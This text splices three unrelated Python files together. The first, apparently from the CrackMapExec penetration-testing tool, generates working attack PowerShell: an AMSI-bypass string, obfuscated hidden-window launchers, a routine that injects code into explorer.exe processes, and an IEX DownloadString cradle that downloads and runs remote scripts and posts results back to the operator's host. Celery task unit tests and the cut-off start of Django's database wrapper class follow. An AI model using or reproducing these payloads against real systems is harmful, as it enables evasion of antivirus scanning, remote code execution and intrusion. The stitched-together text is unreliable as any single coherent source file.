import cme
import os
import logging
import re
import tempfile
from sys import exit
from string import ascii_lowercase
from random import choice, randrange, sample
from subprocess import check_output, call
from cme.helpers.misc import gen_random_string, which
from cme.logger import CMEAdapter
from base64 import b64encode
logger = CMEAdapter()
obfuscate_ps_scripts = False
def get_ps_script(path):
return os.path.join(os.path.dirname(cme.__file__), 'data', path)
def encode_ps_command(command):
return b64encode(command.encode('UTF-16LE'))
def is_powershell_installed():
if which('powershell'):
return True
return False
def obfs_ps_script(path_to_script):
ps_script = path_to_script.split('/')[-1]
obfs_script_dir = os.path.join(os.path.expanduser('~/.cme'), 'obfuscated_scripts')
obfs_ps_script = os.path.join(obfs_script_dir, ps_script)
if is_powershell_installed() and obfuscate_ps_scripts:
if os.path.exists(obfs_ps_script):
logger.info('Using cached obfuscated Powershell script')
with open(obfs_ps_script, 'r') as script:
return script.read()
logger.info('Performing one-time script obfuscation, go look at some memes cause this can take a bit...')
invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "TOKEN,ALL,1,OUT {}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
get_ps_script(path_to_script),
obfs_ps_script)
logging.debug(invoke_obfs_command)
with open(os.devnull, 'w') as devnull:
return_code = call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True)
logger.success('Script obfuscated successfully')
with open(obfs_ps_script, 'r') as script:
return script.read()
else:
with open(get_ps_script(path_to_script), 'r') as script:
"""
Strip block comments, line comments, empty lines, verbose statements,
and debug statements from a PowerShell source file.
"""
# strip block comments
strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '', script.read())
# strip blank lines, lines starting with #, and verbose/debug statements
strippedCode = "\n".join([line for line in strippedCode.split('\n') if ((line.strip() != '') and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")) )])
return strippedCode
def create_ps_command(ps_command, force_ps32=False, dont_obfs=False):
amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
"""
if force_ps32:
command = amsi_bypass + """
$functions = {{
function Command-ToExecute
{{
{command}
}}
}}
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
{{
$job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32
$job | Wait-Job
}}
else
{{
IEX "$functions"
Command-ToExecute
}}
""".format(command=amsi_bypass + ps_command)
else:
command = amsi_bypass + ps_command
logging.debug('Generated PS command:\n {}\n'.format(command))
# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed concurrently
# it would spawn a local powershell process per host which isn't ideal, until I figure out a good way of dealing with this
# it will use the partial python implementation that I stole from GreatSCT (https://github.com/GreatSCT/GreatSCT) <3
"""
if is_powershell_installed():
temp = tempfile.NamedTemporaryFile(prefix='cme_',
suffix='.ps1',
dir='/tmp')
temp.write(command)
temp.read()
encoding_types = [1,2,3,4,5,6]
while True:
encoding = random.choice(encoding_types)
invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
temp.name,
encoding)
logging.debug(invoke_obfs_command)
out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip()
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out)
logging.debug('Command length: {}'.format(len(command)))
if len(command) <= 8192:
temp.close()
break
encoding_types.remove(encoding)
else:
"""
if not dont_obfs:
obfs_attempts = 0
while True:
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "' + invoke_obfuscation(command) + '"'
if len(command) <= 8191:
break
if obfs_attempts == 4:
logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
exit(1)
obfs_attempts += 1
else:
command = 'powershell.exe -noni -nop -w 1 -enc {}'.format(encode_ps_command(command))
if len(command) > 8191:
logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
exit(1)
return command
def gen_ps_inject(command, context=None, procname='explorer.exe', inject_once=False):
#The following code gives us some control over where and how Invoke-PSInject does its thang
#It prioritizes injecting into a process of the active console session
ps_code = '''
$injected = $False
$inject_once = {inject_once}
$command = "{command}"
$owners = @{{}}
$console_login = gwmi win32_computersystem | select -exp Username
gwmi win32_process | where {{$_.Name.ToLower() -eq '{procname}'.ToLower()}} | % {{
if ($_.getowner().domain -and $_.getowner().user){{
$owners[$_.getowner().domain + "\\" + $_.getowner().user] = $_.handle
}}
}}
try {{
if ($owners.ContainsKey($console_login)){{
Invoke-PSInject -ProcId $owners.Get_Item($console_login) -PoshCode $command
$injected = $True
$owners.Remove($console_login)
}}
}}
catch {{}}
if (($injected -eq $False) -or ($inject_once -eq $False)){{
foreach ($owner in $owners.Values) {{
try {{
Invoke-PSInject -ProcId $owner -PoshCode $command
}}
catch {{}}
}}
}}
'''.format(inject_once='$True' if inject_once else '$False',
command=encode_ps_command(command), procname=procname)
if context:
return gen_ps_iex_cradle(context, 'Invoke-PSInject.ps1', ps_code, post_back=False)
return ps_code
def gen_ps_iex_cradle(context, scripts, command=str(), post_back=True):
if type(scripts) is str:
launcher = """
[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{ps_script_name}')
{command}
""".format(server=context.server,
port=context.server_port,
addr=context.localip,
ps_script_name=scripts,
command=command if post_back is False else '').strip()
elif type(scripts) is list:
launcher = '[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n'
launcher +="[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'"
for script in scripts:
launcher += "IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{script}')\n".format(server=context.server,
port=context.server_port,
addr=context.localip,
script=script)
launcher.strip()
launcher += command if post_back is False else ''
if post_back is True:
launcher += '''
$cmd = {command}
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/')
$request.Method = 'POST'
$request.ContentType = 'application/x-www-form-urlencoded'
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd)
$request.ContentLength = $bytes.Length
$requestStream = $request.GetRequestStream()
$requestStream.Write($bytes, 0, $bytes.Length)
$requestStream.Close()
$request.GetResponse()'''.format(server=context.server,
port=context.server_port,
addr=context.localip,
command=command)
#second_cmd= second_cmd if second_cmd else '')
logging.debug('Generated PS IEX Launcher:\n {}\n'.format(launcher))
return launcher.strip()
# Following was stolen from https://raw.githubusercontent.com/GreatSCT/GreatSCT/templates/invokeObfuscation.py
def invoke_obfuscation(scriptString):
# Add letters a-z with random case to $RandomDelimiters.
alphabet = ''.join(choice([i.upper(), i]) for i in ascii_lowercase)
# Create list of random dxelimiters called randomDelimiters.
# Avoid using . * ' " [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax.
randomDelimiters = ['_','-',',','{','}','~','!','@','%','&','<','>',';',':']
for i in alphabet:
randomDelimiters.append(i)
# Only use a subset of current delimiters to randomize what you see in every iteration of this script's output.
randomDelimiters = [choice(randomDelimiters) for _ in range(int(len(randomDelimiters)/4))]
# Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters.
delimitedEncodedArray = ''
for char in scriptString:
delimitedEncodedArray += str(ord(char)) + choice(randomDelimiters)
# Remove trailing delimiter from $DelimitedEncodedArray.
delimitedEncodedArray = delimitedEncodedArray[:-1]
# Create printable version of $RandomDelimiters in random order to be used by final command.
test = sample(randomDelimiters, len(randomDelimiters))
randomDelimitersToPrint = ''.join(i for i in test)
# Generate random case versions for necessary operations.
forEachObject = choice(['ForEach','ForEach-Object','%'])
strJoin = ''.join(choice([i.upper(), i.lower()]) for i in '[String]::Join')
strStr = ''.join(choice([i.upper(), i.lower()]) for i in '[String]')
join = ''.join(choice([i.upper(), i.lower()]) for i in '-Join')
charStr = ''.join(choice([i.upper(), i.lower()]) for i in 'Char')
integer = ''.join(choice([i.upper(), i.lower()]) for i in 'Int')
forEachObject = ''.join(choice([i.upper(), i.lower()]) for i in forEachObject)
# Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax.
randomDelimitersToPrintForDashSplit = ''
for delim in randomDelimiters:
# Random case 'split' string.
split = ''.join(choice([i.upper(), i.lower()]) for i in 'Split')
randomDelimitersToPrintForDashSplit += '-' + split + choice(['', ' ']) + '\'' + delim + '\'' + choice(['', ' '])
randomDelimitersToPrintForDashSplit = randomDelimitersToPrintForDashSplit.strip('\t\n\r')
# Randomly select between various conversion syntax options.
randomConversionSyntax = []
randomConversionSyntax.append('[' + charStr + ']' + choice(['', ' ']) + '[' + integer + ']' + choice(['', ' ']) + '$_')
randomConversionSyntax.append('[' + integer + ']' + choice(['', ' ']) + '$_' + choice(['', ' ']) + choice(['-as', '-As', '-aS', '-AS']) + choice(['', ' ']) + '[' + charStr + ']')
randomConversionSyntax = choice(randomConversionSyntax)
# Create array syntax for encoded scriptString as alternative to .Split/-Split syntax.
encodedArray = ''
for char in scriptString:
encodedArray += str(ord(char)) + choice(['', ' ']) + ',' + choice(['', ' '])
# Remove trailing comma from encodedArray
encodedArray = '(' + choice(['', ' ']) + encodedArray.rstrip().rstrip(',') + ')'
# Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable).
# Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists.
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls
# For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables
setOfsVarSyntax = []
setOfsVarSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "''")
setOfsVarSyntax.append(choice(['Set-Variable', 'SV', 'SET']) + choice([' '*1, ' '*2]) + "'OFS'" + choice([' '*1, ' '*2]) + "''")
setOfsVar = choice(setOfsVarSyntax)
setOfsVarBackSyntax = []
setOfsVarBackSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "' '")
setOfsVarBackSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "' '")
setOfsVarBack = choice(setOfsVarBackSyntax)
# Randomize case of $SetOfsVar and $SetOfsVarBack.
setOfsVar = ''.join(choice([i.upper(), i.lower()]) for i in setOfsVar)
setOfsVarBack = ''.join(choice([i.upper(), i.lower()]) for i in setOfsVarBack)
# Generate the code that will decrypt and execute the payload and randomly select one.
baseScriptArray = []
baseScriptArray.append('[' + charStr + '[]' + ']' + choice(['', ' ']) + encodedArray)
baseScriptArray.append('(' + choice(['', ' ']) + "'" + delimitedEncodedArray + "'." + split + "(" + choice(['', ' ']) + "'" + randomDelimitersToPrint + "'" + choice(['', ' ']) + ')' + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')')
baseScriptArray.append('(' + choice(['', ' ']) + "'" + delimitedEncodedArray + "'" + choice(['', ' ']) + randomDelimitersToPrintForDashSplit + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')')
baseScriptArray.append('(' + choice(['', ' ']) + encodedArray + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')')
# Generate random JOIN syntax for all above options
newScriptArray = []
newScriptArray.append(choice(baseScriptArray) + choice(['', ' ']) + join + choice(['', ' ']) + "''")
newScriptArray.append(join + choice(['', ' ']) + choice(baseScriptArray))
newScriptArray.append(strJoin + '(' + choice(['', ' ']) + "''" + choice(['', ' ']) + ',' + choice(['', ' ']) + choice(baseScriptArray) + choice(['', ' ']) + ')')
newScriptArray.append('"' + choice(['', ' ']) + '$(' + choice(['', ' ']) + setOfsVar + choice(['', ' ']) + ')' + choice(['', ' ']) + '"' + choice(['', ' ']) + '+' + choice(['', ' ']) + strStr + choice(baseScriptArray) + choice(['', ' ']) + '+' + '"' + choice(['', ' ']) + '$(' + choice(['', ' ']) + setOfsVarBack + choice(['', ' ']) + ')' + choice(['', ' ']) + '"')
# Randomly select one of the above commands.
newScript = choice(newScriptArray)
# Generate random invoke operation syntax.
# Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies.
invokeExpressionSyntax = []
invokeExpressionSyntax.append(choice(['IEX', 'Invoke-Expression']))
# Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &.
# Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet.
# These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc.
invocationOperator = choice(['.','&']) + choice(['', ' '])
invokeExpressionSyntax.append(invocationOperator + "( $ShellId[1]+$ShellId[13]+'x')")
invokeExpressionSyntax.append(invocationOperator + "( $PSHome[" + choice(['4', '21']) + "]+$PSHOME[" + choice(['30', '34']) + "]+'x')")
invokeExpressionSyntax.append(invocationOperator + "( $env:Public[13]+$env:Public[5]+'x')")
invokeExpressionSyntax.append(invocationOperator + "( $env:ComSpec[4," + choice(['15', '24', '26']) + ",25]-Join'')")
invokeExpressionSyntax.append(invocationOperator + "((" + choice(['Get-Variable','GV','Variable']) + " '*mdr*').Name[3,11,2]-Join'')")
invokeExpressionSyntax.append(invocationOperator + "( " + choice(['$VerbosePreference.ToString()','([String]$VerbosePreference)']) + "[1,3]+'x'-Join'')")
# Randomly choose from above invoke operation syntaxes.
invokeExpression = choice(invokeExpressionSyntax)
# Randomize the case of selected invoke operation.
invokeExpression = ''.join(choice([i.upper(), i.lower()]) for i in invokeExpression)
# Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX)
invokeOptions = []
invokeOptions.append(choice(['', ' ']) + invokeExpression + choice(['', ' ']) + '(' + choice(['', ' ']) + newScript + choice(['', ' ']) + ')' + choice(['', ' ']))
invokeOptions.append(choice(['', ' ']) + newScript + choice(['', ' ']) + '|' + choice(['', ' ']) + invokeExpression)
obfuscatedPayload = choice(invokeOptions)
"""
# Array to store all selected PowerShell execution flags.
powerShellFlags = []
noProfile = '-nop'
nonInteractive = '-noni'
windowStyle = '-w'
# Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order.
# This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags.
commandlineOptions = []
commandlineOptions.append(noProfile[0:randrange(4, len(noProfile) + 1, 1)])
commandlineOptions.append(nonInteractive[0:randrange(5, len(nonInteractive) + 1, 1)])
# Randomly decide to write WindowStyle value with flag substring or integer value.
commandlineOptions.append(''.join(windowStyle[0:randrange(2, len(windowStyle) + 1, 1)] + choice([' '*1, ' '*2, ' '*3]) + choice(['1','h','hi','hid','hidd','hidde'])))
# Randomize the case of all command-line arguments.
for count, option in enumerate(commandlineOptions):
commandlineOptions[count] = ''.join(choice([i.upper(), i.lower()]) for i in option)
for count, option in enumerate(commandlineOptions):
commandlineOptions[count] = ''.join(option)
commandlineOptions = sample(commandlineOptions, len(commandlineOptions))
commandlineOptions = ''.join(i + choice([' '*1, ' '*2, ' '*3]) for i in commandlineOptions)
obfuscatedPayload = 'powershell.exe ' + commandlineOptions + newScript
"""
return obfuscatedPayload
| |
from __future__ import absolute_import
from datetime import datetime, timedelta
from kombu import Queue
from celery import Task
from celery.exceptions import Retry
from celery.five import items, range, string_t
from celery.result import EagerResult
from celery.utils import uuid
from celery.utils.timeutils import parse_iso8601
from celery.tests.case import AppCase, depends_on_current_app, patch
def return_True(*args, **kwargs):
# Task run functions can't be closures/lambdas, as they're pickled.
return True
def raise_exception(self, **kwargs):
raise Exception('%s error' % self.__class__)
class MockApplyTask(Task):
abstract = True
applied = 0
def run(self, x, y):
return x * y
def apply_async(self, *args, **kwargs):
self.applied += 1
class TasksCase(AppCase):
def setup(self):
self.mytask = self.app.task(shared=False)(return_True)
@self.app.task(bind=True, count=0, shared=False)
def increment_counter(self, increment_by=1):
self.count += increment_by or 1
return self.count
self.increment_counter = increment_counter
@self.app.task(shared=False)
def raising():
raise KeyError('foo')
self.raising = raising
@self.app.task(bind=True, max_retries=3, iterations=0, shared=False)
def retry_task(self, arg1, arg2, kwarg=1, max_retries=None, care=True):
self.iterations += 1
rmax = self.max_retries if max_retries is None else max_retries
assert repr(self.request)
retries = self.request.retries
if care and retries >= rmax:
return arg1
else:
raise self.retry(countdown=0, max_retries=rmax)
self.retry_task = retry_task
@self.app.task(bind=True, max_retries=3, iterations=0, shared=False)
def retry_task_noargs(self, **kwargs):
self.iterations += 1
if self.request.retries >= 3:
return 42
else:
raise self.retry(countdown=0)
self.retry_task_noargs = retry_task_noargs
@self.app.task(bind=True, max_retries=3, iterations=0,
base=MockApplyTask, shared=False)
def retry_task_mockapply(self, arg1, arg2, kwarg=1):
self.iterations += 1
retries = self.request.retries
if retries >= 3:
return arg1
raise self.retry(countdown=0)
self.retry_task_mockapply = retry_task_mockapply
@self.app.task(bind=True, max_retries=3, iterations=0, shared=False)
def retry_task_customexc(self, arg1, arg2, kwarg=1, **kwargs):
self.iterations += 1
retries = self.request.retries
if retries >= 3:
return arg1 + kwarg
else:
try:
raise MyCustomException('Elaine Marie Benes')
except MyCustomException as exc:
kwargs.update(kwarg=kwarg)
raise self.retry(countdown=0, exc=exc)
self.retry_task_customexc = retry_task_customexc
class MyCustomException(Exception):
"""Random custom exception."""
class test_task_retries(TasksCase):
def test_retry(self):
self.retry_task.max_retries = 3
self.retry_task.iterations = 0
self.retry_task.apply([0xFF, 0xFFFF])
self.assertEqual(self.retry_task.iterations, 4)
self.retry_task.max_retries = 3
self.retry_task.iterations = 0
self.retry_task.apply([0xFF, 0xFFFF], {'max_retries': 10})
self.assertEqual(self.retry_task.iterations, 11)
def test_retry_no_args(self):
self.retry_task_noargs.max_retries = 3
self.retry_task_noargs.iterations = 0
self.retry_task_noargs.apply(propagate=True).get()
self.assertEqual(self.retry_task_noargs.iterations, 4)
def test_retry_kwargs_can_be_empty(self):
self.retry_task_mockapply.push_request()
try:
with self.assertRaises(Retry):
import sys
try:
sys.exc_clear()
except AttributeError:
pass
self.retry_task_mockapply.retry(args=[4, 4], kwargs=None)
finally:
self.retry_task_mockapply.pop_request()
def test_retry_not_eager(self):
self.retry_task_mockapply.push_request()
try:
self.retry_task_mockapply.request.called_directly = False
exc = Exception('baz')
try:
self.retry_task_mockapply.retry(
args=[4, 4], kwargs={'task_retries': 0},
exc=exc, throw=False,
)
self.assertTrue(self.retry_task_mockapply.applied)
finally:
self.retry_task_mockapply.applied = 0
try:
with self.assertRaises(Retry):
self.retry_task_mockapply.retry(
args=[4, 4], kwargs={'task_retries': 0},
exc=exc, throw=True)
self.assertTrue(self.retry_task_mockapply.applied)
finally:
self.retry_task_mockapply.applied = 0
finally:
self.retry_task_mockapply.pop_request()
def test_retry_with_kwargs(self):
self.retry_task_customexc.max_retries = 3
self.retry_task_customexc.iterations = 0
self.retry_task_customexc.apply([0xFF, 0xFFFF], {'kwarg': 0xF})
self.assertEqual(self.retry_task_customexc.iterations, 4)
def test_retry_with_custom_exception(self):
self.retry_task_customexc.max_retries = 2
self.retry_task_customexc.iterations = 0
result = self.retry_task_customexc.apply(
[0xFF, 0xFFFF], {'kwarg': 0xF},
)
with self.assertRaises(MyCustomException):
result.get()
self.assertEqual(self.retry_task_customexc.iterations, 3)
def test_max_retries_exceeded(self):
self.retry_task.max_retries = 2
self.retry_task.iterations = 0
result = self.retry_task.apply([0xFF, 0xFFFF], {'care': False})
with self.assertRaises(self.retry_task.MaxRetriesExceededError):
result.get()
self.assertEqual(self.retry_task.iterations, 3)
self.retry_task.max_retries = 1
self.retry_task.iterations = 0
result = self.retry_task.apply([0xFF, 0xFFFF], {'care': False})
with self.assertRaises(self.retry_task.MaxRetriesExceededError):
result.get()
self.assertEqual(self.retry_task.iterations, 2)
class test_canvas_utils(TasksCase):
def test_si(self):
self.assertTrue(self.retry_task.si())
self.assertTrue(self.retry_task.si().immutable)
def test_chunks(self):
self.assertTrue(self.retry_task.chunks(range(100), 10))
def test_map(self):
self.assertTrue(self.retry_task.map(range(100)))
def test_starmap(self):
self.assertTrue(self.retry_task.starmap(range(100)))
def test_on_success(self):
self.retry_task.on_success(1, 1, (), {})
class test_tasks(TasksCase):
def now(self):
return self.app.now()
@depends_on_current_app
def test_unpickle_task(self):
import pickle
@self.app.task(shared=True)
def xxx():
pass
self.assertIs(pickle.loads(pickle.dumps(xxx)), xxx.app.tasks[xxx.name])
def test_AsyncResult(self):
task_id = uuid()
result = self.retry_task.AsyncResult(task_id)
self.assertEqual(result.backend, self.retry_task.backend)
self.assertEqual(result.id, task_id)
def assertNextTaskDataEqual(self, consumer, presult, task_name,
test_eta=False, test_expires=False, **kwargs):
next_task = consumer.queues[0].get(accept=['pickle'])
task_data = next_task.decode()
self.assertEqual(task_data['id'], presult.id)
self.assertEqual(task_data['task'], task_name)
task_kwargs = task_data.get('kwargs', {})
if test_eta:
self.assertIsInstance(task_data.get('eta'), string_t)
to_datetime = parse_iso8601(task_data.get('eta'))
self.assertIsInstance(to_datetime, datetime)
if test_expires:
self.assertIsInstance(task_data.get('expires'), string_t)
to_datetime = parse_iso8601(task_data.get('expires'))
self.assertIsInstance(to_datetime, datetime)
for arg_name, arg_value in items(kwargs):
self.assertEqual(task_kwargs.get(arg_name), arg_value)
def test_incomplete_task_cls(self):
class IncompleteTask(Task):
app = self.app
name = 'c.unittest.t.itask'
with self.assertRaises(NotImplementedError):
IncompleteTask().run()
def test_task_kwargs_must_be_dictionary(self):
with self.assertRaises(ValueError):
self.increment_counter.apply_async([], 'str')
def test_task_args_must_be_list(self):
with self.assertRaises(ValueError):
self.increment_counter.apply_async('str', {})
def test_regular_task(self):
self.assertIsInstance(self.mytask, Task)
self.assertTrue(self.mytask.run())
self.assertTrue(
callable(self.mytask), 'Task class is callable()',
)
self.assertTrue(self.mytask(), 'Task class runs run() when called')
with self.app.connection_or_acquire() as conn:
consumer = self.app.amqp.TaskConsumer(conn)
with self.assertRaises(NotImplementedError):
consumer.receive('foo', 'foo')
consumer.purge()
self.assertIsNone(consumer.queues[0].get())
self.app.amqp.TaskConsumer(conn, queues=[Queue('foo')])
# Without arguments.
presult = self.mytask.delay()
self.assertNextTaskDataEqual(consumer, presult, self.mytask.name)
# With arguments.
presult2 = self.mytask.apply_async(
kwargs=dict(name='George Costanza'),
)
self.assertNextTaskDataEqual(
consumer, presult2, self.mytask.name, name='George Costanza',
)
# send_task
sresult = self.app.send_task(self.mytask.name,
kwargs=dict(name='Elaine M. Benes'))
self.assertNextTaskDataEqual(
consumer, sresult, self.mytask.name, name='Elaine M. Benes',
)
# With eta.
presult2 = self.mytask.apply_async(
kwargs=dict(name='George Costanza'),
eta=self.now() + timedelta(days=1),
expires=self.now() + timedelta(days=2),
)
self.assertNextTaskDataEqual(
consumer, presult2, self.mytask.name,
name='George Costanza', test_eta=True, test_expires=True,
)
# With countdown.
presult2 = self.mytask.apply_async(
kwargs=dict(name='George Costanza'), countdown=10, expires=12,
)
self.assertNextTaskDataEqual(
consumer, presult2, self.mytask.name,
name='George Costanza', test_eta=True, test_expires=True,
)
# Discarding all tasks.
consumer.purge()
self.mytask.apply_async()
self.assertEqual(consumer.purge(), 1)
self.assertIsNone(consumer.queues[0].get())
self.assertFalse(presult.successful())
self.mytask.backend.mark_as_done(presult.id, result=None)
self.assertTrue(presult.successful())
def test_repr_v2_compat(self):
self.mytask.__v2_compat__ = True
self.assertIn('v2 compatible', repr(self.mytask))
def test_apply_with_self(self):
@self.app.task(__self__=42, shared=False)
def tawself(self):
return self
self.assertEqual(tawself.apply().get(), 42)
self.assertEqual(tawself(), 42)
def test_context_get(self):
self.mytask.push_request()
try:
request = self.mytask.request
request.foo = 32
self.assertEqual(request.get('foo'), 32)
self.assertEqual(request.get('bar', 36), 36)
request.clear()
finally:
self.mytask.pop_request()
def test_task_class_repr(self):
self.assertIn('class Task of', repr(self.mytask.app.Task))
self.mytask.app.Task._app = None
self.assertIn('unbound', repr(self.mytask.app.Task, ))
def test_bind_no_magic_kwargs(self):
self.mytask.accept_magic_kwargs = None
self.mytask.bind(self.mytask.app)
def test_annotate(self):
with patch('celery.app.task.resolve_all_annotations') as anno:
anno.return_value = [{'FOO': 'BAR'}]
@self.app.task(shared=False)
def task():
pass
task.annotate()
self.assertEqual(task.FOO, 'BAR')
def test_after_return(self):
self.mytask.push_request()
try:
self.mytask.request.chord = self.mytask.s()
self.mytask.after_return('SUCCESS', 1.0, 'foobar', (), {}, None)
self.mytask.request.clear()
finally:
self.mytask.pop_request()
def test_send_task_sent_event(self):
with self.app.connection() as conn:
self.app.conf.CELERY_SEND_TASK_SENT_EVENT = True
self.assertTrue(self.app.amqp.TaskProducer(conn).send_sent_event)
def test_update_state(self):
@self.app.task(shared=False)
def yyy():
pass
yyy.push_request()
try:
tid = uuid()
yyy.update_state(tid, 'FROBULATING', {'fooz': 'baaz'})
self.assertEqual(yyy.AsyncResult(tid).status, 'FROBULATING')
self.assertDictEqual(yyy.AsyncResult(tid).result, {'fooz': 'baaz'})
yyy.request.id = tid
yyy.update_state(state='FROBUZATING', meta={'fooz': 'baaz'})
self.assertEqual(yyy.AsyncResult(tid).status, 'FROBUZATING')
self.assertDictEqual(yyy.AsyncResult(tid).result, {'fooz': 'baaz'})
finally:
yyy.pop_request()
def test_repr(self):
@self.app.task(shared=False)
def task_test_repr():
pass
self.assertIn('task_test_repr', repr(task_test_repr))
def test_has___name__(self):
@self.app.task(shared=False)
def yyy2():
pass
self.assertTrue(yyy2.__name__)
class test_apply_task(TasksCase):
def test_apply_throw(self):
with self.assertRaises(KeyError):
self.raising.apply(throw=True)
def test_apply_with_CELERY_EAGER_PROPAGATES_EXCEPTIONS(self):
self.app.conf.CELERY_EAGER_PROPAGATES_EXCEPTIONS = True
with self.assertRaises(KeyError):
self.raising.apply()
def test_apply(self):
self.increment_counter.count = 0
e = self.increment_counter.apply()
self.assertIsInstance(e, EagerResult)
self.assertEqual(e.get(), 1)
e = self.increment_counter.apply(args=[1])
self.assertEqual(e.get(), 2)
e = self.increment_counter.apply(kwargs={'increment_by': 4})
self.assertEqual(e.get(), 6)
self.assertTrue(e.successful())
self.assertTrue(e.ready())
self.assertTrue(repr(e).startswith('<EagerResult:'))
f = self.raising.apply()
self.assertTrue(f.ready())
self.assertFalse(f.successful())
self.assertTrue(f.traceback)
with self.assertRaises(KeyError):
f.get()
| |
import copy
import time
import warnings
from collections import deque
from contextlib import contextmanager
import _thread
import pytz
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db import DEFAULT_DB_ALIAS
from django.db.backends import utils
from django.db.backends.base.validation import BaseDatabaseValidation
from django.db.backends.signals import connection_created
from django.db.transaction import TransactionManagementError
from django.db.utils import DatabaseError, DatabaseErrorWrapper
from django.utils import timezone
from django.utils.functional import cached_property
NO_DB_ALIAS = '__no_db__'
class BaseDatabaseWrapper:
"""Represent a database connection."""
# Mapping of Field objects to their column types.
data_types = {}
# Mapping of Field objects to their SQL suffix such as AUTOINCREMENT.
data_types_suffix = {}
# Mapping of Field objects to their SQL for CHECK constraints.
data_type_check_constraints = {}
ops = None
vendor = 'unknown'
display_name = 'unknown'
SchemaEditorClass = None
# Classes instantiated in __init__().
client_class = None
creation_class = None
features_class = None
introspection_class = None
ops_class = None
validation_class = BaseDatabaseValidation
queries_limit = 9000
def __init__(self, settings_dict, alias=DEFAULT_DB_ALIAS,
allow_thread_sharing=False):
# Connection related attributes.
# The underlying database connection.
self.connection = None
# `settings_dict` should be a dictionary containing keys such as
# NAME, USER, etc. It's called `settings_dict` instead of `settings`
# to disambiguate it from Django settings modules.
self.settings_dict = settings_dict
self.alias = alias
# Query logging in debug mode or when explicitly enabled.
self.queries_log = deque(maxlen=self.queries_limit)
self.force_debug_cursor = False
# Transaction related attributes.
# Tracks if the connection is in autocommit mode. Per PEP 249, by
# default, it isn't.
self.autocommit = False
# Tracks if the connection is in a transaction managed by 'atomic'.
self.in_atomic_block = False
# Increment to generate unique savepoint ids.
self.savepoint_state = 0
# List of savepoints created by 'atomic'.
self.savepoint_ids = []
# Tracks if the outermost 'atomic' block should commit on exit,
# ie. if autocommit was active on entry.
self.commit_on_exit = True
# Tracks if the transaction should be rolled back to the next
# available savepoint because of an exception in an inner block.
self.needs_rollback = False
# Connection termination related attributes.
self.close_at = None
self.closed_in_transaction = False
self.errors_occurred = False
# Thread-safety related attributes.
self.allow_thread_sharing = allow_thread_sharing
self._thread_ident = _thread.get_ident()
# A list of no-argument functions to run when the transaction commits.
# Each entry is an (sids, func) tuple, where sids is a set of the
# active savepoint IDs when this function was registered.
self.run_on_commit = []
